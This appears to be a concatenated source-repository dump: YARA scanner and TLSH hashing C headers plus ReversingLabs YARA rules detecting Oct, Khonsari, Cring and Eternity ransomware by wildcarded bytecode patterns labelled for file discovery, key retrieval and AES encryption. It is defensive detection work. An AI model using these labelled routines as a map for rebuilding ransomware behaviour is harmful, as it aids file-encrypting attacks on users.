IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_SCANNER_H 31 | #define YR_SCANNER_H 32 | 33 | #include 34 | #include 35 | #include 36 | 37 | typedef YR_SCAN_CONTEXT YR_SCANNER; 38 | 39 | YR_API int yr_scanner_create(YR_RULES* rules, YR_SCANNER** scanner); 40 | 41 | YR_API void yr_scanner_destroy(YR_SCANNER* scanner); 42 | 43 | YR_API void yr_scanner_set_callback( 44 | YR_SCANNER* scanner, 45 | YR_CALLBACK_FUNC callback, 46 | void* user_data); 47 | 48 | YR_API void yr_scanner_set_timeout(YR_SCANNER* scanner, int timeout); 49 | 50 | YR_API void yr_scanner_set_flags(YR_SCANNER* scanner, int flags); 51 | 52 | YR_API int yr_scanner_define_integer_variable( 53 | YR_SCANNER* scanner, 54 | const char* identifier, 55 | int64_t value); 56 | 57 | YR_API int yr_scanner_define_boolean_variable( 58 | YR_SCANNER* scanner, 59 | const char* identifier, 60 | int value); 61 | 62 | YR_API int yr_scanner_define_float_variable( 63 | YR_SCANNER* scanner, 64 | const char* identifier, 65 | double value); 66 | 67 | YR_API int yr_scanner_define_string_variable( 68 | YR_SCANNER* scanner, 69 | const char* identifier, 70 | const char* value); 71 | 72 | YR_API int yr_scanner_scan_mem_blocks( 73 | YR_SCANNER* scanner, 74 | YR_MEMORY_BLOCK_ITERATOR* iterator); 75 | 76 | YR_API int yr_scanner_scan_mem( 77 | YR_SCANNER* scanner, 78 | const uint8_t* buffer, 79 | size_t buffer_size); 80 | 81 | YR_API int yr_scanner_scan_file(YR_SCANNER* scanner, const char* filename); 82 | 83 | YR_API int yr_scanner_scan_fd(YR_SCANNER* scanner, YR_FILE_DESCRIPTOR fd); 84 | 85 | YR_API int yr_scanner_scan_proc(YR_SCANNER* scanner, int pid); 86 | 87 | YR_API YR_RULE* yr_scanner_last_error_rule(YR_SCANNER* scanner); 88 | 89 | YR_API YR_STRING* yr_scanner_last_error_string(YR_SCANNER* scanner); 90 | 91 | YR_API YR_RULE_PROFILING_INFO* yr_scanner_get_profiling_info( 92 | YR_SCANNER* scanner); 93 | 94 | YR_API void yr_scanner_reset_profiling_info(YR_SCANNER* scanner); 95 | 96 | YR_API int yr_scanner_print_profiling_info(YR_SCANNER* scanner); 97 | 98 | #endif 99 | -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Oct.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Oct : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "OCT" 12 | description = "Yara rule that detects Oct ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Oct" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $encrypt_files = { 21 | 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 03 0B 07 18 73 ?? ?? ?? ?? 0C 73 22 | ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 04 06 23 | 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F 24 | ?? ?? ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 19 6F ?? 25 | ?? ?? ?? 09 17 6F ?? ?? ?? ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? 26 | ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? D2 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 13 ?? 15 33 27 | ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? 28 | 13 ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 2A 29 | } 30 | 31 | $find_files = { 32 | 16 0A 38 ?? ?? ?? ?? 16 0B 2B ?? 02 06 9A 28 ?? ?? ?? ?? 2C ?? 02 06 9A 73 ?? ?? ?? ?? 33 | 0C 08 72 ?? ?? ?? ?? 03 07 9A 28 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0D 09 13 ?? 16 13 ?? 2B 34 | ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 05 28 ?? ?? ?? ?? 1E 35 | 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 36 | 11 ?? 8E 69 32 ?? 07 17 58 0B 07 03 8E 69 32 ?? 06 17 58 0A 06 02 8E 69 3F ?? ?? ?? ?? 37 | 2A 38 | } 39 | 40 | $collect_env_and_start_enc_proc = { 41 | 19 8D ?? ?? ?? ?? 0B 07 16 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 17 1B 42 | 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 18 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? 43 | ?? 28 ?? ?? ?? ?? A2 07 1F ?? 8D ?? ?? ?? ?? 0C 08 16 72 ?? ?? ?? ?? A2 08 17 72 ?? ?? 44 | ?? ?? A2 08 18 72 ?? ?? ?? ?? A2 08 19 72 ?? ?? ?? ?? A2 08 1A 72 ?? ?? ?? ?? A2 08 1B 45 | 72 ?? ?? ?? ?? A2 08 1C 72 ?? ?? ?? ?? A2 08 1D 72 ?? ?? ?? ?? A2 08 1E 72 ?? ?? ?? ?? 46 | A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 47 | 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 48 | 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? 49 | ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? 50 | ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 72 ?? ?? ?? ?? 72 ?? ?? 51 | ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 52 | 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 72 ?? ?? ?? ?? 16 53 | 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 72 ?? ?? 54 | ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2A 55 | } 56 | 57 | condition: 58 | uint16(0) == 0x5A4D and 59 | ( 60 | $collect_env_and_start_enc_proc 61 | ) and 62 | ( 63 | $find_files 64 | ) and 65 | ( 66 | $encrypt_files 67 | ) 68 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Khonsari.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Khonsari : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "KHONSARI" 12 | description = "Yara rule that detects Khonsari ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Khonsari" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $find_files = { 21 | 73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 22 | 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 0B 23 | 16 0C 2B ?? 07 08 9A 0D 09 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? 24 | ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 09 25 | 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 06 1B 28 ?? ?? ?? ?? 6F ?? 26 | ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 27 | 06 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 28 | ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 29 | 06 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 30 | 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 2D ?? 00 11 31 | ?? 7E ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 72 ?? 32 | ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? 33 | ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F 34 | ?? ?? ?? ?? DC DE ?? 26 DE ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ?? 35 | ?? ?? ?? 6F ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 36 | 28 ?? ?? ?? ?? 26 2A 37 | } 38 | 39 | $get_key = { 40 | 73 ?? ?? ?? ?? 0A 06 12 ?? FE 15 ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 41 | ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D 42 | ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? 43 | ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 07 6F ?? 44 | ?? ?? ?? 06 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 45 | ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 17 6F ?? 46 | ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A 47 | } 48 | 49 | $encrypt_files = { 50 | 28 ?? ?? ?? ?? 0A 06 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 6F ?? ?? ?? ?? 06 20 51 | ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 6F ?? ?? 52 | ?? ?? 06 19 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F 53 | ?? ?? ?? ?? 06 06 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 02 03 07 28 ?? ?? 54 | ?? ?? 0C DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A 55 | } 56 | 57 | condition: 58 | uint16(0) == 0x5A4D and 59 | ( 60 | $find_files 61 | ) and 62 | ( 63 | $get_key 64 | ) and 65 | ( 66 | $encrypt_files 67 | ) 68 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Cring.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Cring : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "CRING" 12 | description = "Yara rule that detects Cring ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Cring" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $find_files_p1 = { 21 | 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 08 6F ?? ?? ?? ?? 19 2E ?? 08 6F ?? ?? ?? ?? 22 | 18 33 ?? 08 6F ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 02 17 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 23 | 0D 2B ?? 09 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09 6F 24 | ?? ?? ?? ?? DC 07 17 58 0B 07 06 8E 69 32 ?? 2A 25 | } 26 | 27 | $find_files_p2 = { 28 | 02 7B ?? ?? ?? ?? 0B 07 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 16 0A DD ?? 29 | ?? ?? ?? 02 15 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? 30 | ?? ?? 14 0C 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 2C 31 | ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? ?? 2B ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 32 | 9A 0D 02 09 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 17 0A DD ?? ?? ?? ?? 02 15 7D ?? ?? ?? 33 | ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 8E 69 34 | 32 ?? 02 14 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 39 ?? ?? ?? ?? 14 0C 02 7B ?? ?? ?? ?? 28 35 | ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 39 ?? ?? ?? ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? 36 | ?? 38 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 9A 13 ?? 02 11 ?? 02 7B ?? ?? ?? 37 | ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 1F ?? 7D ?? ?? ?? 38 | ?? 2B ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 02 11 ?? 7D ?? ?? ?? ?? 02 18 7D ?? ?? 39 | ?? ?? 17 0A DE ?? 02 1F ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 28 40 | ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ?? 41 | ?? ?? 02 7B ?? ?? ?? ?? 8E 69 3F ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 16 0A DE ?? 02 28 ?? 42 | ?? ?? ?? DC 06 2A 43 | } 44 | 45 | $encrypt_files = { 46 | 16 0A 73 ?? ?? ?? ?? 0B 07 6F ?? ?? ?? ?? 1E 5B 8D ?? ?? ?? ?? 0C 07 6F ?? ?? ?? ?? 1E 47 | 5B 8D ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 08 6F ?? ?? ?? ?? 11 ?? 09 6F ?? ?? ?? 48 | ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 8E 69 09 8E 69 58 8D ?? ?? ?? ?? 13 ?? 49 | 08 11 ?? 08 8E 69 28 ?? ?? ?? ?? 09 16 11 ?? 08 8E 69 09 8E 69 28 ?? ?? ?? ?? 11 ?? 04 50 | 28 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 28 ?? ?? ?? ?? 13 ?? 07 08 09 6F ?? ?? ?? ?? 13 ?? 02 51 | 19 73 ?? ?? ?? ?? 13 ?? 03 18 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 73 ?? ?? ?? ?? 13 ?? 52 | 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 53 | ?? 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 54 | 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F 55 | ?? ?? ?? ?? DC 17 0A DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2A 56 | } 57 | 58 | condition: 59 | uint16(0) == 0x5A4D and 60 | ( 61 | all of ($find_files_p*) 62 | ) and 63 | ( 64 | $encrypt_files 65 | ) 66 | } -------------------------------------------------------------------------------- /src/lib/tlshc/tlsh_impl.h: -------------------------------------------------------------------------------- 1 | #ifndef __TLSH_TLSH_IMPL_H__ 2 | #define __TLSH_TLSH_IMPL_H__ 3 | 4 | #include 5 | 6 | #define SLIDING_WND_SIZE 5 7 | 8 | #define BUCKETS 256 9 | #define Q_BITS 2 // 2 bits; quartile value 0, 1, 2, 3 10 | 11 | // BUCKETS_256 & CHECKSUM_3B are compiler switches defined in CMakeLists.txt 12 | 13 | #if defined BUCKETS_256 14 | #define EFF_BUCKETS 256 15 | #define CODE_SIZE 64 // 256 * 2 bits = 64 bytes 16 | #if defined CHECKSUM_3B 17 | #define INTERNAL_TLSH_STRING_LEN 138 18 | #define TLSH_CHECKSUM_LEN 3 19 | // defined in tlsh.h #define TLSH_STRING_LEN 138 // 2 + 3 + 64 bytes = 138 20 | // hexidecimal chars 21 | #else 22 | #define INTERNAL_TLSH_STRING_LEN 134 23 | #define TLSH_CHECKSUM_LEN 1 24 | // defined in tlsh.h #define TLSH_STRING_LEN 134 // 2 + 1 + 64 bytes = 134 25 | // hexidecimal chars 26 | #endif 27 | #endif 28 | 29 | #if defined BUCKETS_128 30 | #define EFF_BUCKETS 128 31 | #define CODE_SIZE 32 // 128 * 2 bits = 32 bytes 32 | #if defined CHECKSUM_3B 33 | #define INTERNAL_TLSH_STRING_LEN 74 34 | #define TLSH_CHECKSUM_LEN 3 35 | // defined in tlsh.h #define TLSH_STRING_LEN 74 // 2 + 3 + 32 bytes = 74 36 | // hexidecimal chars 37 | #else 38 | #define INTERNAL_TLSH_STRING_LEN 70 39 | #define TLSH_CHECKSUM_LEN 1 40 | // defined in tlsh.h #define TLSH_STRING_LEN 70 // 2 + 1 + 32 bytes = 70 41 | // hexidecimal chars 42 | #endif 43 | #endif 44 | 45 | #if defined BUCKETS_48 46 | #define INTERNAL_TLSH_STRING_LEN 33 47 | #define EFF_BUCKETS 48 48 | #define CODE_SIZE 12 // 48 * 2 bits = 12 bytes 49 | #define TLSH_CHECKSUM_LEN 1 50 | // defined in tlsh.h #define TLSH_STRING_LEN 30 // 2 + 1 + 12 bytes = 30 51 | // hexidecimal chars 52 | #endif 53 | 54 | #ifdef __cplusplus 55 | extern "C" 56 | { 57 | #endif 58 | 59 | #pragma pack(push) 60 | #pragma pack(1) 61 | 62 | typedef struct 63 | { 64 | unsigned char checksum[TLSH_CHECKSUM_LEN]; 65 | unsigned char lvalue; 66 | union 67 | { 68 | unsigned char qb; 69 | struct 70 | { 71 | #if defined(WORDS_BIGENDIAN) 72 | unsigned char q2ratio : 4; 73 | unsigned char q1ratio : 4; 74 | #else 75 | unsigned char q1ratio : 4; 76 | unsigned char q2ratio : 4; 77 | #endif 78 | } QR; 79 | } Q; 80 | unsigned char tmp_code[CODE_SIZE]; 81 | } LshBinStruct; 82 | 83 | #pragma pack(pop) 84 | 85 | typedef struct TlshImpl 86 | { 87 | unsigned int *a_bucket; 88 | unsigned char slide_window[SLIDING_WND_SIZE]; 89 | unsigned int data_len; 90 | LshBinStruct lsh_bin; 91 | char *lsh_code; 92 | bool lsh_code_valid; 93 | } TlshImpl; 94 | 95 | TlshImpl *tlsh_impl_new(); 96 | void tlsh_impl_free(TlshImpl *impl); 97 | 98 | int tlsh_impl_update( 99 | TlshImpl *impl, 100 | const unsigned char *data, 101 | unsigned int len, 102 | int tlsh_option); 103 | void tlsh_impl_final(TlshImpl *impl, int fc_cons_option); 104 | void tlsh_impl_reset(TlshImpl *impl); 105 | int tlsh_impl_is_valid(TlshImpl *impl); 106 | int tlsh_impl_compare(TlshImpl *impl, TlshImpl *other); 107 | int tlsh_impl_total_diff(TlshImpl *impl, TlshImpl *other, bool len_diff); 108 | int tlsh_impl_lvalue(TlshImpl *impl); 109 | int tlsh_impl_q1ratio(TlshImpl *impl); 110 | int tlsh_impl_q2ratio(TlshImpl *impl); 111 | int tlsh_impl_checksum(TlshImpl *impl, int k); 112 | int tlsh_impl_bucket_value(TlshImpl *impl, int bucket); 113 | int tlsh_impl_histogram_count(TlshImpl *impl, int bucket); 114 | int tlsh_impl_from_tlsh_str(TlshImpl *impl, const char *str); 115 | const char *tlsh_impl_hash(TlshImpl *impl, bool showvers); 116 | 117 | #ifdef __cplusplus 118 | } 119 | #endif 120 | 121 | #endif // __TLSH_TLSH_IMPL_H__ -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Eternity.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Eternity : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "ETERNITY" 12 | description = "Yara rule that detects Eternity ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Eternity" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $find_files = { 21 | 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? 22 | ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 0C 2B ?? 08 23 | 6F ?? ?? ?? ?? 0D 09 03 04 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F 24 | ?? ?? ?? ?? DC 02 28 ?? ?? ?? ?? 0B 07 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 25 | ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 26 | 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 27 | ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 28 | 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 29 | ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 03 04 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 17 58 30 | 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A 31 | } 32 | 33 | $encrypt_files = { 34 | 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 0A 02 35 | 28 ?? ?? ?? ?? 0B 07 06 28 ?? ?? ?? ?? 0C 02 19 28 ?? ?? ?? ?? 0D 09 16 6A 6F ?? ?? ?? 36 | ?? 09 6F ?? ?? ?? ?? 02 1C 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? 37 | ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 38 | 08 16 08 8E 69 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F 39 | ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 2A 40 | } 41 | 42 | $aes_encrypt = { 43 | 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 73 ?? ?? 44 | ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ?? 45 | ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? 46 | ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? 47 | ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11 48 | ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ?? 49 | 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 06 2A 50 | } 51 | 52 | $encrypt_pass = { 53 | 72 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 0B D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 54 | 08 07 6F ?? ?? ?? ?? A5 ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 09 6F ?? ?? ?? ?? 7E 55 | ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 56 | 16 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 57 | ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 2A 58 | } 59 | 60 | condition: 61 | uint16(0) == 0x5A4D and 62 | ( 63 | $find_files 64 | ) and 65 | ( 66 | $encrypt_files 67 | ) and 68 | ( 69 | $aes_encrypt 70 | ) and 71 | ( 72 | $encrypt_pass 73 | ) 74 | } -------------------------------------------------------------------------------- /src/lib/include/yara/bitmask.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2018. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used 